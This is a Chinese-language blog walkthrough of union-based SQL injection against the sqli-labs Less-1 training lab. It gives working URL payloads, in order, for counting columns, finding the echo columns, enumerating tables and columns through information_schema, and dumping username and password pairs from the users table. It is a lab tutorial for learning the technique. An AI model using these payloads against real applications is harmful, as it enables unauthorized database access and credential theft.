sql注入方式之联合注入

最新推荐文章于 2024-08-11 18:16:25 发布
最新推荐文章于 2024-08-11 18:16:25 发布
阅读量1.1k 收藏 14
点赞数 19
分类专栏: web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/137509205
版权

1.1 靶场环境

系统centos7 IP地址192.168.1.24

1.2 联合注入原理

联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段要数要相同,不然会出现报错。

1.3 找注入点

找注入点,当输入id=1 and 1=2时没有变化,尝试单引号闭合找到注入类型

字符型注入,单引号闭合

1.4 判断字段数

使用order by 爆破字段数

http://192.168.1.24/sqli-labs/Less-1/?id=-1' order by 3--+ 没有报错
http://192.168.1.24/sqli-labs/Less-1/?id=-1' order by 4--+ 报错

字段数为4

1.5 找回显点

http://192.168.1.24/sqli-labs/Less-1/?id=-1' union select 1,2,3,4--+

爆出回显点2,3

1.6 爆数据库与数据库版本信息

开始信息收集(注意union前后格式要相同)

?id=-1' union select 1,database(),version()--+
database():当前数据库名
version():数据库版本
user():数据库用户,用于判断是否有最高权限

爆数据库名以及数据库版本

1.7 爆数据表

爆破表名
?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--+

得到emails,referers,uagents,users数据表

1.8 爆users表中字段名

?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'--+

得到这些字段名user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password

1.9 爆用户名及密码

爆破字段内容
?id=-1' union select 1,2,(select group_concat(username,password)from users)--+

在 sql 注入时加入换行符

我们可以在每一个用户名:密码后面添加一个换行符。

HTML 中换行符用来表示,但是我们需要转换成十六进制 0x3C,0x68,0x72,0x2F,0x3E

ASCII 码表:ASCII_百度百科

将十六进制的换行符添加到 password 字段后,注:password 后面必须添加一个逗号

http://192.168.1.24/sqli-labs/Less-1/?id=-1' union select 1,group_concat(username,0x3a,password,0x3C,0x68,0x72,0x2F,0x3E),3 from users--+

可以看到每一行都是一个用户名:密码

乐队1
关注
  • 19
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL注入
輚至消亡
01-19 8695
0. PHPStorm代码调试方法 加上&XDEBUG_SESSION_START=PHPSTORM即可 1. 联合查询注入 利用前提: 页面上有显示位 优点: 方便快捷, 易于利用 缺点: 需要显示位 细分: 字符型注入 实践一下: 成功注入: 可以构造如下来判定是否存在字符型注入: 整型注入 实践一下: 成功 联合注入利用order by和group by判断表的列 order by后面是可以接列号的,比如以第一列排序...
SQL注入总结1(union注入
insaneol的博客
07-07 131
SQL注入的原理:将未被正确过滤、验证或转义的用户提供的输入提交到服务端,从而使攻击者能够执行恶意的SQL查询或篡改据库的操作。学习SQL注入之前,要先会一些基本的SQL查询语句。否则很难理解SQL语句查询过程和为什么会产生SQL注入
SQL注入学习之union联合查询注入
LTNSLALALA的博客
06-13 4340
文章主要是对SQL注入中基于union联合查询注入方式的实践记录。
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改据库查询,他们就能获取敏感信息、修改据甚至完全控制系统。《SQL...
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
sql注入靶场.zip
06-24
此外,了解不同据库系统(如MySQL、PostgreSQL、Oracle)的特性也十分有用,因为不同的据库系统可能对SQL注入的处理方式不同。 对于错误基线注入,攻击者会尝试通过引发服务器错误来获取关于查询结构的信息。...
SQL注入思路详解
12-14
一旦确认了SQL注入,攻击者会进一步确认注入方式,常见的SQL注入类型包括: 1. **联合查询注入(Union Query)**:通过`UNION`操作合并两个或更多查询的结果,直接展示据库中的据。 2. **报错注入(Error Based...
网络安全知识渗透测试
m0_66268916的博客
08-09 582
渗透测试是一种模拟网络攻击,用于识别漏洞并制定规避防御措施的策略。笔测试还有助于评估组织的合规性、提高员工对安全协议的认识、评估事件响应计划的有效性并确保业务连续性。渗透测试的第一步是收集有关目标网络的信息,了解网络拓扑、主机信息、服务信息、用户账户等,以便制定针对性的攻击策略。成功攻破目标系统后,需要进行后渗透测试,巩固攻击成果,并获取更多信息。根据信息收集和漏洞扫描的结果,选择合适的攻击方法,对目标网络进行渗透测试。完成渗透测试后,需要对测试结果进行分析,评估内网的整体安全状况。
加强混合工作时代的组织网络安全态势
网络研究观
08-09 494
多样化工作环境的整合需要强大的安全措施、创新的保护策略和警惕的文化,以确保混合工作的好处大于相关风险。
网络安全(黑客)—自学手册
dexi113的博客
08-05 1636
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
网络安全流程规范文件解读(安全专业L1级)
qyq88888的专栏
08-11 984
网络运行重大故障定义涵盖了现网各类重要业务和设备:1.重大业务故障:话音业务、据业务、互联互通业务2.重大设备故障:传输网、承载网(IP承载网及CMNET)、无线接入网、核心网、语音增值平台、据网、网管网、电源、空调。3.TD网络重大故障。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 2万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
Python 操作 MySQL 据库.pdf
08-13
Python 操作 MySQL 据库.pdf
安装包单片机开发.zip
08-13
安装包
信息安全简单介绍.pdf
08-13
信息安全简单介绍.pdf
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习
08-13
python简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习 简历是展示个人经历、技能和能力的重要文档,以下是一个常见的简历格式和内容模板,供您参考: 简历格式: 头部信息:包括姓名、联系方式(电话号码、电子邮件等)、地址等个人基本信息。 求职目标(可选):简短描述您的求职意向和目标。 教育背景:列出您的教育经历,包括学校名称、所学专业、就读时间等。 工作经验:按时间顺序列出您的工作经历,包括公司名称、职位、工作时间、工作职责和成就等。 技能和能力:列出您的专业技能、语言能力、计算机技能等与职位相关的能力。 实习经验/项目经验(可选):如果您有相关实习或项目经验,可以列出相关信息。 获奖和荣誉(可选):列出您在学术、工作或其他领域获得的奖项和荣誉。 自我评价(可选):简要描述您的个人特点、能力和职业目标。 兴趣爱好(可选):列出您的兴趣爱好,展示您的多样性和个人素质。 参考人(可选):如果您有可提供推荐的人员,可以在简历中提供其联系信息。 简历内容模板: 姓名: 联系方式: 地址: 求职目标: (简短描
UGUI Super ScrollView v2.5.4
08-13
一个好用的Unity UGui 循环滚动列表插件. 有 List 和 Grid 等多种模式, 包含了脚本代码, 以及相关的一些示例Demo. UGUI Super ScrollView gives easily-customizable ScrollView, based on UGUI ScrollRect. It is a set of C# scripts to help you create ScrollView that you need. It’s very powerful and highly optimized for performance.
video_20240811_193112.mp4
最新发布
08-13
video_20240811_193112.mp4
SQL注入详解:union联合查询与防御策略
本文主要聚焦于SQL注入中的union联合查询技巧。 **SQL注入原理** 当Web应用接收用户输入作为查询时,如果未对这些输入进行充分验证,攻击者可以利用特殊字符构造恶意SQL语句。SQL注入通过在查询中插入额外的SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值